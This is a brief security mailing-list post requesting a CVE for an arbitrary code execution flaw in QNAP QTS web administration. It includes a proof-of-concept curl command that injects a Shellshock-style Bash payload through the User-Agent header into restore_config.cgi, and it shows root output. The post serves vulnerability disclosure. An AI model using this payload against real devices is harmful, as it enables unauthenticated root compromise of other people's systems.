CVE request: QNAP QTS

[Ken Lee <echain.tw () gmail com>]

Hello,

QNAP QTS [1] employ Bash as the default shell and we discover an arbitrary
code execution flaw with UID=0 via `Web administration'.
The PoC is shown as below:

> $ curl -A '() { :;}; echo Content-Type: text/html; echo; echo
> `/usr/bin/id`' http://QNAP_QTS:8080/cgi-bin/restore_config.cgi
> *uid=0(admin) gid=0(administrators)*
> HTTP/1.1 200 OK


{ "authPassed": 1, "Result": 0 }


This issue has been acknowledged [2] by QNAP and if not assigned yet,
please help to arrange a CVE identifier for this issue.
Thank you, and have a nice day.


Reference:
[1] http://www.qnap.com.tw/i/en/qts4
[2] http://www.qnap.com/useng/index.php?lang=en-us&sn=885&c=3036&sc=&n=22457